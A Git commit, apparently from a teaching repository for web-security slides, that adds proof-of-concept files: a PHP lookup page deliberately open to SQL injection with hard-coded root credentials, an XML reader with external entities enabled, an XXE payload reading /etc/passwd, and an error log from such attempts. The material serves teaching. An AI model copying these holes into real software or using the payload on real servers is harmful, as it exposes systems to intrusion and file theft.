loviuz/slide-web-security
loviuz
/
slide-web-security
mirror of https://github.com/loviuz/slide-web-security.git
1
0
Fork 0
Code Issues Releases Wiki Activity

Aggiunta PoC

This commit is contained in:
loviuz 2021-05-01 18:06:01 +02:00
parent 046dbef7c8
commit 961a991a5b
4 changed files with 68 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
poc/sqli_example.php Normal file
View File

@ -0,0 +1,35 @@
<?php
if( !isset($_GET['id'])) {
echo '
<form action="" method="GET">
<input type="text" name="id" placeholder="Cerca un cliente tramite ID...">
<br>
<button type="submit">Cerca anagrafica</button>
</form>';
} else {
$dblink = mysqli_connect("localhost", "root", "mysql", "osm_master");
/* If connection fails throw an error */
if (mysqli_connect_errno()) {
echo "Could not connect to database: Error: ".mysqli_connect_error();
exit();
}
$sqlquery = "SELECT * FROM an_anagrafiche WHERE idanagrafica='".$_GET['id']."'";
if ($result = mysqli_query($dblink, $sqlquery)) {
while ($row = mysqli_fetch_assoc($result)) {
echo "#".$row["idanagrafica"]." - ".$row["ragione_sociale"].", ".$row['citta']."<br />";
}
mysqli_free_result($result);
}
mysqli_close($dblink);
}

12
poc/xxe/php_errors.log Normal file
View File

@ -0,0 +1,12 @@
[23-Dec-2020 16:25:04 Europe/Rome] PHP Warning: DOMDocument::loadXML(): ParsePI: PI php never end ... in file:///var/www/html/osm_master/config.inc.php, line: 47 in /var/www/html/web_security/xxe/readxml.php on line 6
[23-Dec-2020 16:25:04 Europe/Rome] PHP Warning: DOMDocument::loadXML(): Failure to process entity comando in Entity, line: 8 in /var/www/html/web_security/xxe/readxml.php on line 6
[23-Dec-2020 16:25:04 Europe/Rome] PHP Warning: DOMDocument::loadXML(): Entity 'comando' not defined in Entity, line: 8 in /var/www/html/web_security/xxe/readxml.php on line 6
[23-Dec-2020 16:25:04 Europe/Rome] PHP Warning: simplexml_import_dom(): Invalid Nodetype to import in /var/www/html/web_security/xxe/readxml.php on line 7
[23-Dec-2020 16:25:04 Europe/Rome] PHP Notice: Trying to get property 'nome' of non-object in /var/www/html/web_security/xxe/readxml.php on line 10
[23-Dec-2020 16:25:04 Europe/Rome] PHP Notice: Trying to get property 'cognome' of non-object in /var/www/html/web_security/xxe/readxml.php on line 12
[23-Dec-2020 16:25:35 Europe/Rome] PHP Warning: DOMDocument::loadXML(): ParsePI: PI php never end ... in file:///var/www/html/osm_master/config.inc.php, line: 47 in /var/www/html/web_security/xxe/readxml.php on line 6
[23-Dec-2020 16:25:35 Europe/Rome] PHP Warning: DOMDocument::loadXML(): Failure to process entity comando in Entity, line: 8 in /var/www/html/web_security/xxe/readxml.php on line 6
[23-Dec-2020 16:25:35 Europe/Rome] PHP Warning: DOMDocument::loadXML(): Entity 'comando' not defined in Entity, line: 8 in /var/www/html/web_security/xxe/readxml.php on line 6
[23-Dec-2020 16:25:35 Europe/Rome] PHP Warning: simplexml_import_dom(): Invalid Nodetype to import in /var/www/html/web_security/xxe/readxml.php on line 7
[23-Dec-2020 16:25:35 Europe/Rome] PHP Notice: Trying to get property 'nome' of non-object in /var/www/html/web_security/xxe/readxml.php on line 10
[23-Dec-2020 16:25:35 Europe/Rome] PHP Notice: Trying to get property 'cognome' of non-object in /var/www/html/web_security/xxe/readxml.php on line 12

12
poc/xxe/readxml.php Executable file
View File

@ -0,0 +1,12 @@
<?php
$xml_string = file_get_contents('xxe.xml');
$dom = new DOMDocument();
$dom->loadXML($xml_string, LIBXML_NOENT | LIBXML_DTDLOAD);
$xml = simplexml_import_dom($dom);
echo '
<b>NOME:</b> '.$xml->nome.
'<br>
<b>COGNOME</b>: '.$xml->cognome;

9
poc/xxe/xxe.xml Executable file
View File

@ -0,0 +1,9 @@
<?xml version="1.0"?>
<!DOCTYPE utente [
<!ELEMENT nome ANY>
<!ELEMENT cognome ANY>
<!ENTITY comando SYSTEM "file:///etc/passwd">]>
<utente>
<nome>Mario</nome>
<cognome>Rossi &comando;</cognome>
</utente>